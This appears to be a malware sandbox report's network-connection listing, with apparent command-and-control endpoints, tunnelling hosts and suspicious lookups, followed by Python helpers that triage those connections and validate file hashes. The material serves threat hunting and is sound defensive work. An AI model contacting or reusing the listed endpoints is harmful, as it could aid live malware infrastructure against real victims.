US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
GB 89.197.154.116:80 89.197.154.116 tcp
US 104.20.4.235:443 pastebin.com tcp
TR 94.156.177.155:80 94.156.177.155 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
GB 89.197.154.116:7810 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
HK 117.18.7.76:3782 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
DE 185.218.125.157:21441 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 66.45.226.53:7777 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
CN 8.134.163.72:801 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 se-blurry.biz udp
US 8.8.8.8:53 zinc-sneark.biz udp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
US 8.8.8.8:53 formy-spill.biz udp
US 8.8.8.8:53 covery-mover.biz udp
US 8.8.8.8:53 dare-curbys.biz udp
US 8.8.8.8:53 print-vexer.biz udp
US 8.8.8.8:53 impend-differ.biz udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 fivexx5ht.top udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
VN 14.243.221.170:3322 tcp
DE 185.218.125.157:21441 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:1504 tcp
US 104.20.4.235:443 pastebin.com tcp
DE 3.70.228.168:555 tcp
KR 152.67.212.187:443 tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 fivexx5ht.top udp
US 104.20.4.235:443 pastebin.com tcp
FR 51.159.4.50:8080 tcp
US 66.45.226.53:7777 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:5552 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 73.62.14.5:4782 tcp
N/A 127.0.0.1:5552 tcp
N/A 127.0.0.1:1504 tcp
VE 167.250.49.155:80 167.250.49.155 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 66.45.226.53:7777 tcp
US 8.8.8.8:53 fivexx5ht.top udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 147.185.221.17:39017 profile-indians.gl.at.ply.gg tcp
US 8.8.8.8:53 safe.ywxww.net udp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:5552 tcp
CN 60.191.236.246:820 safe.ywxww.net tcp
US 8.8.8.8:53 fivexx5ht.top udp
US 8.8.8.8:53 microsoftsys.ddns.net udp
HK 117.18.7.76:3782 tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 late-lil.at.ply.gg udp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
NL 89.110.69.103:80 89.110.69.103 tcp
US 66.45.226.53:7777 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 fivexx5ht.top udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:5552 tcp
N/A 127.0.0.1:1504 tcp
N/A 127.0.0.1:5552 tcp
VN 14.243.221.170:3322 tcp
US 104.20.4.235:443 pastebin.com tcp
DE 167.235.70.96:8080 tcp
DE 3.70.228.168:555 tcp
RU 185.81.68.156:80 185.81.68.156 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:5552 tcp
US 8.8.8.8:53 fivexx5ht.top udp
US 8.8.8.8:53 microsoftsys.ddns.net udp
US 66.45.226.53:7777 tcp
N/A 127.0.0.1:1504 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
DE 185.218.125.157:21441 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:5552 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 fivexx5ht.top udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 73.62.14.5:4782 tcp
US 104.21.16.1:80 downsexv.com tcp
N/A 127.0.0.1:5552 tcp
N/A 127.0.0.1:1504 tcp
CN 103.24.179.18:7004 tcp
US 104.21.16.1:8080 downsexv.com tcp
US 66.45.226.53:7777 tcp
US 104.20.4.235:443 pastebin.com tcp
US 147.185.221.17:39017 profile-indians.gl.at.ply.gg tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:5552 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
HK 117.18.7.76:3782 tcp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:1504 tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:5552 tcp
US 8.8.8.8:53 fivexx5ht.top udp
DE 185.218.125.157:21441 tcp
KR 152.67.212.187:443 tcp
US 66.45.226.53:7777 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
DE 194.164.198.113:8080 tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:5552 tcp
N/A 127.0.0.1:1504 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
DE 3.70.228.168:555 tcp
US 8.8.8.8:53 fivexx5ht.top udp
US 104.20.4.235:443 pastebin.com tcp
VN 14.243.221.170:3322 tcp
N/A 127.0.0.1:5552 tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 fivexx5ht.top udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 66.45.226.53:7777 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
DE 185.218.125.157:21441 tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:5552 tcp
US 73.62.14.5:4782 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:1504 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 66.45.226.53:7777 tcp
N/A 127.0.0.1:5552 tcp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
US 104.20.4.235:443 pastebin.com tcp
RU 185.215.113.209:80 185.215.113.209 tcp
US 104.20.4.235:443 pastebin.com tcp
HK 117.18.7.76:3782 tcp
IT 185.225.73.67:1050 tcp
US 98.51.190.130:20 tcp
DE 185.218.125.157:21441 tcp
GB 132.145.17.167:9090 132.145.17.167 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 147.185.221.17:39017 profile-indians.gl.at.ply.gg tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 104.20.4.235:443 pastebin.com tcp
US 66.45.226.53:7777 tcp
FR 91.134.82.79:443 i.ibb.co tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
GB 20.26.156.215:443 github.com tcp
DE 3.70.228.168:555 tcp
DE 209.38.221.184:8080 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
VN 14.243.221.170:3322 tcp
US 98.51.190.130:20 tcp
US 104.20.4.235:443 pastebin.com tcp
DE 185.218.125.157:21441 tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
N/A 127.0.0.1:5552 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 66.45.226.53:7777 tcp
DE 46.235.26.83:8080 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 73.62.14.5:4782 tcp
US 98.51.190.130:20 tcp
RU 185.81.68.156:80 185.81.68.156 tcp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
IT 185.225.73.67:1050 tcp
US 66.45.226.53:7777 tcp
HK 117.18.7.76:3782 tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
DE 185.218.125.157:21441 tcp
KR 152.67.212.187:443 tcp
US 66.45.226.53:7777 tcp
DE 3.70.228.168:555 tcp
US 8.8.8.8:53 profile-indians.gl.at.ply.gg udp
US 147.185.221.17:39017 profile-indians.gl.at.ply.gg tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 98.51.190.130:20 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
VN 14.243.221.170:3322 tcp
US 104.20.4.235:443 pastebin.com tcp
DE 147.28.185.29:80 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 73.62.14.5:4782 tcp
US 104.20.4.235:443 pastebin.com tcp
US 66.45.226.53:7777 tcp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
DE 185.218.125.157:21441 tcp
US 104.20.4.235:443 pastebin.com tcp
IT 185.225.73.67:1050 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
NL 206.166.251.4:8080 tcp
US 98.51.190.130:20 tcp
US 104.20.4.235:443 pastebin.com tcp
HK 117.18.7.76:3782 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 download.skycn.com udp
US 66.45.226.53:7777 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
CN 116.114.98.35:80 download.skycn.com tcp
N/A 192.168.56.1:4782 tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 98.51.190.130:20 tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
DE 3.70.228.168:555 tcp
US 66.45.226.53:7777 tcp
US 104.20.4.235:443 pastebin.com tcp
US 147.185.221.17:39017 profile-indians.gl.at.ply.gg tcp
DE 185.218.125.157:21441 tcp
US 104.20.4.235:443 pastebin.com tcp
US 98.51.190.130:20 tcp
VN 14.243.221.170:3322 tcp
IT 185.225.73.67:1050 tcp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
US 73.62.14.5:4782 tcp
FR 51.159.4.50:8080 tcp
US 66.45.226.53:7777 tcp
RU 185.215.113.66:80 185.215.113.66 tcp
HK 117.18.7.76:3782 tcp
US 66.45.226.53:7777 tcp
N/A 192.168.56.1:4782 tcp
N/A 127.0.0.1:1504 tcp
TR 94.156.177.33:80 tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
DE 185.218.125.157:21441 tcp
RU 185.81.68.156:80 185.81.68.156 tcp
DE 3.70.228.168:555 tcp
US 98.51.190.130:20 tcp
US 66.45.226.53:7777 tcp
N/A 127.0.0.1:5552 tcp
US 147.185.221.17:39017 profile-indians.gl.at.ply.gg tcp
IT 185.225.73.67:1050 tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
DE 167.235.70.96:8080 tcp
VN 14.243.221.170:3322 tcp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
US 73.62.14.5:4782 tcp
DE 185.218.125.157:21441 tcp
US 66.45.226.53:7777 tcp
HK 117.18.7.76:3782 tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
TR 94.156.177.33:80 tcp
KR 152.67.212.187:443 tcp
N/A 192.168.56.1:4782 tcp
US 66.45.226.53:7777 tcp
US 98.51.190.130:20 tcp
DE 3.70.228.168:555 tcp
N/A 127.0.0.1:5552 tcp
US 66.45.226.53:7777 tcp
DE 185.218.125.157:21441 tcp
IT 185.225.73.67:1050 tcp
DE 194.164.198.113:8080 tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
VN 14.243.221.170:3322 tcp
US 73.62.14.5:4782 tcp
US 147.185.221.17:39017 profile-indians.gl.at.ply.gg tcp
US 98.51.190.130:20 tcp
US 66.45.226.53:7777 tcp
HK 117.18.7.76:3782 tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
N/A 192.168.56.1:4782 tcp
US 66.45.226.53:7777 tcp
DE 3.70.228.168:555 tcp
DE 185.218.125.157:21441 tcp
GB 132.145.17.167:9090 132.145.17.167 tcp
IT 185.225.73.67:1050 tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
NL 89.110.69.103:80 89.110.69.103 tcp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
US 66.45.226.53:7777 tcp
US 98.51.190.130:20 tcp
RU 185.81.68.156:80 185.81.68.156 tcp
DE 185.218.125.157:21441 tcp
US 73.62.14.5:4782 tcp
VN 14.243.221.170:3322 tcp
US 147.185.221.17:39017 profile-indians.gl.at.ply.gg tcp
HK 117.18.7.76:3782 tcp
US 66.45.226.53:7777 tcp
US 98.51.190.130:20 tcp
N/A 192.168.56.1:4782 tcp
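A triage helper for the connection listing above, added here as a worked example; it is not part of the sandbox report. It parses the report's "CC ip:port [domain] proto" rows, moves resolver queries (udp/53) and lab-only addresses (loopback, and the 192.168.56.0/24 range that VirtualBox uses for host-only adapters) into their own buckets, separates the legitimate public services that appear in the listing from the remaining external endpoints, and counts rows per endpoint so the most-contacted destinations surface first. The set of public services is an assumption chosen by hand from the hostnames above, and the embedded rows are a constructed subset copied from the listing.

```python
import ipaddress
import re
from collections import Counter, defaultdict

# Constructed sample: a subset of rows copied from the connection listing above,
# in the report's own "CC ip:port [domain] proto" layout.
SAMPLE_CONNECTIONS = """\
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 fivexx5ht.top udp
US 66.45.226.53:7777 tcp
DE 185.218.125.157:21441 tcp
N/A 127.0.0.1:5552 tcp
US 73.62.14.5:4782 tcp
US 147.185.221.229:35022 late-lil.at.ply.gg tcp
US 8.8.8.8:53 microsoftsys.ddns.net udp
RU 185.215.113.209:80 185.215.113.209 tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 66.45.226.53:7777 tcp
N/A 192.168.56.1:4782 tcp
US 104.20.4.235:443 pastebin.com tcp
"""

# Legitimate public services seen in the listing (assumption: picked by hand from the
# hostnames above). Their IPs cannot be blocked; what was fetched from them is the question.
PUBLIC_SERVICES = {"pastebin.com", "api.telegram.org", "github.com", "i.ibb.co"}

ROW_RE = re.compile(
    r"^(?P<cc>\S+)\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)"
    r"(?:\s+(?P<domain>\S+))?\s+(?P<proto>tcp|udp)$"
)


def parse_connections(text):
    """Parse the report rows into dicts; rows that do not fit the layout are skipped."""
    records = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        rec = m.groupdict()
        rec["port"] = int(rec["port"])
        if rec["domain"] == rec["ip"]:  # a domain column that repeats the IP carries no name
            rec["domain"] = None
        records.append(rec)
    return records


def classify(rec):
    """Bucket a row so resolver traffic and lab-only addresses do not hide the real endpoints."""
    ip = ipaddress.ip_address(rec["ip"])
    if rec["proto"] == "udp" and rec["port"] == 53:
        return "dns-lookup"      # the query to the resolver; the IOC is the name, not 8.8.8.8
    if ip.is_loopback:
        return "loopback"        # connections to a listener on the analysis host itself
    if ip.is_private:
        return "lab-network"     # 192.168.56.x is the VirtualBox host-only range
    if rec["domain"] in PUBLIC_SERVICES:
        return "public-service"
    return "external"


def summarize(records):
    """bucket -> Counter mapping (ip, port, proto, domain) to the number of rows seen."""
    buckets = defaultdict(Counter)
    for rec in records:
        buckets[classify(rec)][(rec["ip"], rec["port"], rec["proto"], rec["domain"])] += 1
    return buckets


def external_iocs(records):
    """(ip, port, domain, hits) for external endpoints, most-contacted first."""
    hits = summarize(records)["external"]
    return sorted(((ip, port, domain, n) for (ip, port, _proto, domain), n in hits.items()),
                  key=lambda t: (-t[3], t[0], t[1]))


def dns_names(records):
    """Names the sample asked the resolver for; hunt for these in DNS logs."""
    return sorted({r["domain"] for r in records if classify(r) == "dns-lookup" and r["domain"]})


if __name__ == "__main__":
    recs = parse_connections(SAMPLE_CONNECTIONS)
    for ip, port, domain, n in external_iocs(recs):
        print(f"{ip}:{port:<6} {domain or '-':<30} x{n}")
    print("resolved names:", ", ".join(dns_names(recs)))
```

Repeated rows for one endpoint are reconnection attempts, so the hit count is a rough measure of how persistently a channel was used; a udp/53 row only tells you which name was looked up, so the name, not the resolver address, is what goes on the block list.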

Files

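A parser for the Files listing that follows, added as a worked example and not the sandbox's own tooling. Each entry is a path followed by MD5, SHA1, SHA256 and SHA512 rows; memory-dump entries carry no digests, and the same path can appear several times with different digests when the file was rewritten during detonation. The code checks that each digest has the right length and is hex, groups repeated paths, finds an entry by any of its digests, and recognises the zero-length-input digests (the named pipe \??\PIPE\wkssvc entry carries exactly those) by computing them with hashlib rather than typing them in. The embedded records are a constructed subset copied from the listing.

```python
import hashlib
import re
from collections import defaultdict

# Expected hex length of each digest column in the report.
DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
DIGEST_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+(\S+)$")
HEX_RE = re.compile(r"^[0-9a-f]+$")

# Digests of zero-length input, computed here instead of being hard-coded.
EMPTY_DIGESTS = {name: getattr(hashlib, name.lower())(b"").hexdigest() for name in DIGEST_LEN}

# Constructed sample: six records copied from the listing, in the report's own layout.
SAMPLE_FILES = r"""
C:\Users\Admin\Desktop\Microsoft Edge.lnk

MD5 cc7b4e1bf018d155945b3dec2fc29d49
SHA1 ea64874eec1e6972b824983e26c21d5b100912a2
SHA256 5407351ffefddd734369f1a360370ada4196f1a3686cfecd80bb184d4db81288
SHA512 a772fb14afbf0a8249c04295e53035eb7fdae0bc869e529d5ae1452887c2d64bd7f9dacef003f12858a6899ff823442074b00b7ac0dc53dff4f04d3385e4d64f

memory/4684-35-0x00000264DF530000-0x00000264DF531000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\sessionstore-backups\recovery.baklz4

MD5 120b7f16405ff21fc43a5aade290a11d
SHA1 1d80cc3e747ca5b7532e185e092b22784301c3c8
SHA256 7d0905bea6b223308f7e4b3a6cfbdd6439a0e3ade57b43ea7a86eb8cfa8346b6
SHA512 621f3484b65fbc86cdfae4cfa7be8a329c85f4943a415249c57dfa54d333386af61b2c418a2efd603a15ec0c27446ea8a3ce73938c3b506ca62f014b618a8ccd

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\cvbzj2yx.default-release\sessionstore-backups\recovery.baklz4

MD5 893f39cddf5f11a1a8be7b4fba89a773
SHA1 5729be345d1ad1062b522b282b7febf53383db26
SHA256 95738b5901b7b107161fd4d99b7827230072bfeb3d2fe9dd2281cc41b881d1db
SHA512 d81bd904e218572ee79e217c1497be537f7adfc0fdba364872e4952ce2cc3cd2dbeefc082f36dac4c85e29839c3bdf29618be0cdc5b6e8e4ac024eaf543527ed

\??\PIPE\wkssvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\Procmon64.exe

MD5 223b222ce387a7f446d49a1ee9b572bb
SHA1 8ed888a02861142e5eb576385568c2ba0ddd8589
SHA256 3e15995894f38b2eead95f7ff714585471f34f3af3d8f50a7f83344781502468
SHA512 037b4787af5fb129a3b1e0ac9565e59d5a55ef26ccf93bc9adf685c08422071ee0d0eb4667cd2ce0d725c7dea0209c1d7d48baf58cd18dfb58de35bf7feef1a2
"""


def parse_file_records(text):
    """Split the listing into {"path", "digests"} entries; any non-digest line starts a new entry."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = DIGEST_RE.match(line)
        if m and entries:
            entries[-1]["digests"][m.group(1)] = m.group(2).lower()
        else:
            entries.append({"path": line, "digests": {}})
    return entries


def validate(entry):
    """List what is wrong with an entry's digests; an empty list means all four are well-formed."""
    digests = entry["digests"]
    if not digests:
        return ["no digests recorded"]  # memory dumps, or an entry cut off at the page boundary
    problems = []
    for algo, want in DIGEST_LEN.items():
        value = digests.get(algo)
        if value is None:
            problems.append(f"{algo} missing")
        elif len(value) != want or not HEX_RE.match(value):
            problems.append(f"{algo} malformed: {value}")
    return problems


def is_empty_content(entry):
    """True when every recorded digest is the digest of zero bytes (a named pipe, an empty file)."""
    digests = entry["digests"]
    return bool(digests) and all(EMPTY_DIGESTS[algo] == value for algo, value in digests.items())


def writes_per_path(entries):
    """Map path -> list of SHA256 values; more than one distinct value means the file was rewritten."""
    groups = defaultdict(list)
    for e in entries:
        groups[e["path"]].append(e["digests"].get("SHA256"))
    return dict(groups)


def rewritten_paths(entries):
    return sorted(p for p, hashes in writes_per_path(entries).items() if len(set(hashes)) > 1)


def find_by_digest(entries, digest):
    """Paths whose MD5/SHA1/SHA256/SHA512 equals the given hex digest, case-insensitively."""
    digest = digest.lower()
    return [e["path"] for e in entries if digest in e["digests"].values()]


ENTRIES = parse_file_records(SAMPLE_FILES)

if __name__ == "__main__":
    for e in ENTRIES:
        flags = validate(e) or (["empty content"] if is_empty_content(e) else ["ok"])
        print(f"{e['path']}: {', '.join(flags)}")
    print("rewritten during the run:", rewritten_paths(ENTRIES))
```

An entry whose four digests all equal the zero-length-input values tells you the sandbox recorded a handle to an object with no readable content, not a file worth hashing against a threat-intel feed; a path listed several times with different digests is the one to pull from the sandbox as separate versions.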
